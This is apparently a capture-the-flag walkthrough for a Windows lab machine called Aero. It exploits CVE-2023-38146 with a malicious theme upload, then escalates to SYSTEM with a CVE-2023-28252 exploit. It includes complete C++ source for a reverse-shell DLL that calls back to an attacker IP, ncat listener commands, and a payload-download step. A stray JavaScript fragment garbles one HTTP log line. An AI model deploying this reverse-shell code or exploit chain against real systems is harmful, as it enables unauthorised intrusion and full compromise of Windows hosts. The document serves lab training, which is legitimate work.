# Aero
## Box info
## Enumeration
### Nmap
Let's start by enumerating ports using `Nmap`:
```
szczygielka@hacks$ nmap -sVC -p- 10.129.229.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 18:40 EST
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds
```
The scan result indicates that only port 80 with `Microsoft-IIS/10.0` server is open.
### Exploring website
After entering the IP address of the machine in the browser, we get the following page:
The description on the webpage indicates that the website is intended to allow users to upload themes for `Windows 11` operating system:
Due to information found in Microsoft [documentation](https://learn.microsoft.com/en-us/windows/win32/controls/themesfileformat-overview), Windows themes should have `.theme` or `.themepack` extension. Now let's move on to file transfers:
Let's find an example `.theme` file, in our case it will be `aero.theme` and let's upload to the webpage:
The file upload seems to be working fine. Attempts to upload a file with an extension other than `.theme` or `.themepack` fails:
Let's search the Internet for information related to vulnerabilities connected with using theme files.
### CVE-2023-38146
The search results lead us to the vulnerability identified as CVE-2023-38146, which may occur in the Windows 11 operating system. The [documentation](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-38146) on Microsoft's website shows that this vulnerability may lead to remote code execution. This vulnerability might be exploited by loading the Windows theme file with access to an attacker-controlled SMB share.
## Exploitation
We do not know what version of the Windows operating system we are dealing with, but searching results on Google indicates that `Microsoft-IIS/10.0` was introduced with `Windows Server 2016` and `Windows 10`. So we can assume that the operating system may also be `Windows 11`. Let's look for an exploit that we can use against the vulnerability we found.
**PoC**
The code exploiting the vulnerability can be found in the following repository:
{% embed url="" fullWidth="false" %}
Let's download the release of this repository first. The `ThemeBleed.zip` file we downloaded contains the following files:
```
szczygielka@hacks$ find . -type f -exec file {} \;
./ThemeBleed.pdb: MSVC program database ver 7.00, 512*95 bytes
./ThemeBleed.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./SMBLibrary.Win32.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./data/stage_1: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_2: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_3: PE32+ executable (DLL) (console) x86-64, for MS Windows, 7 sections
./SMBLibrary.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
```
The README file indicates that `ThemeBleed.exe` allows us to do 3 things: start the server, generate a `.theme` file referencing a specific host, or generate a `.themepack` file referencing a specific host. There are 3 binary files in the `data` directory: `stage_1`, `stage_2` and `stage_3`. To create our payload we have to create a DDL with an exported name `VerifyThemeVersion`, and replace `stage_3` with the library we created.
We want to create a DLL with a payload that would enable us to obtain a reverse shell. To create it we have to switch from Linux VM to Windows VM with Visual Studio installed. Walkthrough how to create your own DLL library using Visual Studio can be found [here](https://learn.microsoft.com/en-us/cpp/build/walkthrough-creating-and-using-a-dynamic-link-library-cpp?view=msvc-170).
Let's open `Visual Studio`, select `Create new project` and then choose `Dynamic-Link Library (DLL)`:
Let's name our solution `stage_3`. After creating the solution we should have the following files:
Let's add the `rev_shell.cpp` and `rev_shell.h` files to our project. After adding them, the project structure should look like this:
According to the information from the repository containing the exploit, we should add the export of `VerifyThemeVersion` function to our file `rev_shell.h`. Information on how to do that can be found on the [Microsoft webpage](https://learn.microsoft.com/en-us/cpp/build/exporting-from-a-dll-using-declspec-dllexport?view=msvc-170). After adding an export our file `rev_shell.h` should look as follows:
```
#pragma once
extern "C" __declspec(dllexport) int VerifyThemeVersion(void);
```
Let's include `rev_shell.h` in the `pch.h` file. The `pch.h` file after including the header file:
```
// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.
#ifndef PCH_H
#define PCH_H
// add headers that you want to pre-compile here
#include "framework.h"
#include "rev_shell.h"
#endif //PCH_H
```
Let's move to the `rev_shell.cpp` file. First, let's find code in C++ that should allow us to get a reverse shell. In this case, we will use the code from the following repository:
{% embed url="" %}
After adapting the code to our problem, the `rev_shell.cpp` code looks as follows:
```
#include "pch.h"
#include
#include
#include
#include
#include
#include "rev_shell.h"
#pragma comment(lib, "Ws2_32.lib")
#define REMOTE_ADDR "10.10.16.15"
#define REMOTE_PORT "443"
int VerifyThemeVersion(void)
{
FreeConsole();
WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
struct addrinfo* result = NULL, * ptr = NULL, hints;
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result);
ptr = result;
SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL);
connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.hStdInput = (HANDLE)ConnectSocket;
si.hStdOutput = (HANDLE)ConnectSocket;
si.hStdError = (HANDLE)ConnectSocket;
TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
WSACleanup();
return 0;
}
```
Exploit from GitHub starts the SMB server on port 445. Therefore, before starting the server, we should check whether this port is not currently busy. We can check it via the following command:
```
PS C:\Users\Szczygielka\Documents> netstat -aon | findstr 445
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP [::]:445 [::]:0 LISTENING 4
```
To free port 445 we need to set the startup type of `Server` Windows service to `Disable` and reboot Windows VM. After that, we can prepare a malicious theme `aero.theme` via the following command:
{% code fullWidth="false" %}
```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.16.15 aero.theme
```
{% endcode %}
Let's start the server:
```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
```
And let's run listener:
```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
```
Now upload the prepared `aero.theme` file to the webpage:
In the console with the server running, we can see that the`stage_3` library has been loaded:
```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 3 - LoadLibrary
```
Let's check if we managed to get the reverse shell:
```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 10.129.229.128:49679.
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```
Success! We received the reverse shell as a user `sam.emerson`:
```
C:\Windows\system32>whoami
whoami
aero\sam.emerson
```
### User flag
The user flag can be obtained from `C:\Users\sam.emerson\Desktop\user.txt`**.**
## Privilege escalation
In `sam.emerson` user `Documents` we found a pdf file which name is connected with one of the CVEs:
```
C:\Users\sam.emerson\Documents>dir
Volume in drive C has no label.
Volume Serial Number is C009-0DB2
Directory of C:\Users\sam.emerson\Documents
09/21/2023 01:58 PM .
09/20/2023 04:08 AM ..
09/21/2023 08:18 AM 14,158 CVE-2023-28252_Summary.pdf
09/26/2023 12:06 PM 1,113 watchdog.ps1
2 File(s) 15,271 bytes
2 Dir(s) 6,129,287,168 bytes free
```
The easiest way to get `CVE-2023-28252_Summary.pdf` file is to encode it to `Base64` and decode it using `CyberChef`. Let's change the console to PowerShell and encode the file via the following command:
```
PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
```
Use the `CyberChef` to decode it from `Base64`:
Now save the file as `CVE-2023-28252_Summary.pdf`. Let's check its contents:
The pdf file contains information about `CVE-2023-28252`, which use may lead to privilege escalation. This document also indicates the existence of a security patch released by Microsoft in April 2023. Internet search [results](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252) indicate that the patch for this vulnerability was released on April 11, 2023, and that Windows 11 may also be vulnerable.
Let's look for an exploit for this vulnerability:
{% embed url="" %}
Let's download the contents of the repository to the attacking virtual machine and open the solution using `Visual Studio`:
The solution only contains 1 `.cpp` file - `clfs_eop.cpp` file. Let's analyze its code:
At the end of the file, we can see that `notepad.exe` is executed if privilege escalation is successful. We want to change this payload so that it allows us to get a reverse shell as a `system` user. In this case, we will use `PowerShell #3 (Base64)` a payload from [this](https://www.revshells.com/) website. Don't forget to change IP address and port number. Let's paste the reverse shell into the code instead of `notepad.exe` , and build the project to `Release`.
Now let's go to the directory where the compiled executable file `clfs_eop.exe` is located, and run a Python HTTP server:
```
PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
```
Let's move to our target machine and download the file `clfs_eop.exe` via the following command:
```
wget http://10.10.16.15:10000/clfs_eop.exe -OutFile clfs_eop.exe
```
The file was downloaded:
```
PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
::ffff:10.129.229.128 - - [23/Feb/2024 15:46:07] "GET /clfs_eop.exe HTTP/1.1" 200 -const message = "hello world";
console.log(message);
```
Let's prepare the listener:
```
/PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
```
And let's execute `clfs_eop.exe` on attacking machine:
```
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10
```
In the listener, we received a connection:
```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.129.229.128:65249.
PS C:\Users\sam.emerson>
```
Let's check which user we are:
```
PS C:\Users\sam.emerson> whoami
nt authority\system
```
### Root flag
The root flag can be obtained from the following location `C:\Users\Administrator\Desktop\root.txt`.
